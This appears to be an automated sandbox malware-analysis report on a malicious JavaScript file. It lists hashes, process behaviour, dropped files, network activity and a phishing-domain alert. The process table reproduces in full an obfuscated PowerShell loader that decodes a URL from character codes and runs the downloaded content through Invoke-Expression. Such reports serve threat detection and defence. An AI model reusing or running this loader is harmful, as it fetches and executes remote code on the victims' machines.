| File name: | 815a3d9eac45d9c7d6f04e2d0819f23ebe76357ef4099e818a30972137914664 |
| Full analysis: | https://app.any.run/tasks/db67ffb9-ea6c-43a5-980f-8e12f6c186e9 |
| Verdict: | Malicious activity |
| Analysis date: | March 24, 2025, 13:28:44 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/javascript |
| File info: | JavaScript source, Unicode text, UTF-8 text, with very long lines (1924) |
| MD5: | 0311F20493750F224589BA60BBDACA98 |
| SHA1: | AAC1B010B454F575BBCABDF34A1F1657F3AB73C8 |
| SHA256: | 815A3D9EAC45D9C7D6F04E2D0819F23EBE76357EF4099E818A30972137914664 |
| SSDEEP: | 1536:i3CzmAWkuruWWJT9v8ur4rF1NWkuruWWJT9v8zr4rF1/WkuruWWJT9v8J:i3GlKhM |
MALICIOUS
PHISHING has been detected (SURICATA)
- svchost.exe (PID: 2196)
Execute application with conhost.exe as parent process
- powershell.exe (PID: 7848)
Gets information about running processes via WMI (SCRIPT)
- wscript.exe (PID: 7700)
SUSPICIOUS
Creates an object to access WMI (SCRIPT)
- wscript.exe (PID: 7700)
Executed via WMI
- conhost.exe (PID: 7816)
Starts POWERSHELL.EXE for commands execution
- conhost.exe (PID: 7816)
INFO
Disables trace logs
- powershell.exe (PID: 7848)
Script raised an exception (POWERSHELL)
- powershell.exe (PID: 7848)
Checks proxy server information
- powershell.exe (PID: 7848)
Reads the software policy settings
- slui.exe (PID: 2392)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
Total processes
125
Monitored processes
5
Malicious processes
1
Suspicious processes
3
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2196 | C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache | C:\Windows\System32\svchost.exe | services.exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Host Process for Windows Services Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2392 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | svchost.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7700 | "C:\Windows\System32\WScript.exe" C:\Users\admin\Desktop\815a3d9eac45d9c7d6f04e2d0819f23ebe76357ef4099e818a30972137914664.js | C:\Windows\System32\wscript.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.812.10240.16384 Modules
| |||||||||||||||
| 7816 | conhost --headless powershell $casqgvmefbn='ur' ;set-alias protons c$($casqgvmefbn)l;$bpwxlndyjvk=(3864,3850,3857,3860,3859,3866,3851,3854,3863,3850,3858,3866,3857,3795,3860,3859,3857,3854,3859,3850,3796,3798,3795,3861,3853,3861,3812,3864,3810,3851,3857,3854,3847,3846,3847,3848,3799,3798);$rbdqhxwngta=('ertigos','get-cmdlet');$gmqrsnpfjk=$bpwxlndyjvk;foreach($uzteajqm in $gmqrsnpfjk){$krqjzvih=$uzteajqm;$oymhgkrdeptn=$oymhgkrdeptn+[char]($krqjzvih-3749);$wngxva=$oymhgkrdeptn; $dvelyuhskgqi=$wngxva};$vczjkyxfspld[2]=$dvelyuhskgqi;$zqoprstvng='rl';$dlgcyhrub=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $dvelyuhskgqi) | C:\Windows\System32\conhost.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7848 | powershell $casqgvmefbn='ur' ;set-alias protons c$($casqgvmefbn)l;$bpwxlndyjvk=(3864,3850,3857,3860,3859,3866,3851,3854,3863,3850,3858,3866,3857,3795,3860,3859,3857,3854,3859,3850,3796,3798,3795,3861,3853,3861,3812,3864,3810,3851,3857,3854,3847,3846,3847,3848,3799,3798);$rbdqhxwngta=('ertigos','get-cmdlet');$gmqrsnpfjk=$bpwxlndyjvk;foreach($uzteajqm in $gmqrsnpfjk){$krqjzvih=$uzteajqm;$oymhgkrdeptn=$oymhgkrdeptn+[char]($krqjzvih-3749);$wngxva=$oymhgkrdeptn; $dvelyuhskgqi=$wngxva};$vczjkyxfspld[2]=$dvelyuhskgqi;$zqoprstvng='rl';$dlgcyhrub=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $dvelyuhskgqi) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | conhost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
Total events
8 270
Read events
8 269
Write events
1
Delete events
0
Modification events
| (PID) Process: | (7700) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe |
| Operation: | write | Name: | JScriptSetScriptStateStarted |
Value: 30C6100000000000 | |||
Executable files
0
Suspicious files
1
Text files
2
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 7848 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_oh51u05a.ach.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 7848 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_wpbcyh1v.gah.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 7848 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:8D1499D5D2FD8359BF245D6370DEFD55 | SHA256:191654EBFAEBA2B506283011249D54A6453FB17E4AE072D63BF7728A489A7BB5 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
19
DNS requests
3
Threats
1
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
— | — | POST | 500 | 20.83.72.98:443 | https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail | unknown | xml | 512 b | whitelisted |
— | — | POST | 500 | 40.91.76.224:443 | https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail | unknown | xml | 512 b | whitelisted |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
— | — | 51.124.78.146:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
2104 | svchost.exe | 51.124.78.146:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
7392 | slui.exe | 40.91.76.224:443 | activation-v2.sls.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
2392 | slui.exe | 40.91.76.224:443 | activation-v2.sls.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
DNS requests
Domain | IP | Reputation |
|---|---|---|
google.com |
| whitelisted |
selonufiremul.online |
| unknown |
activation-v2.sls.microsoft.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
2196 | svchost.exe | Possible Social Engineering Attempted | PHISHING [ANY.RUN] Suspected Phishing Domain (selonufiremul .online) |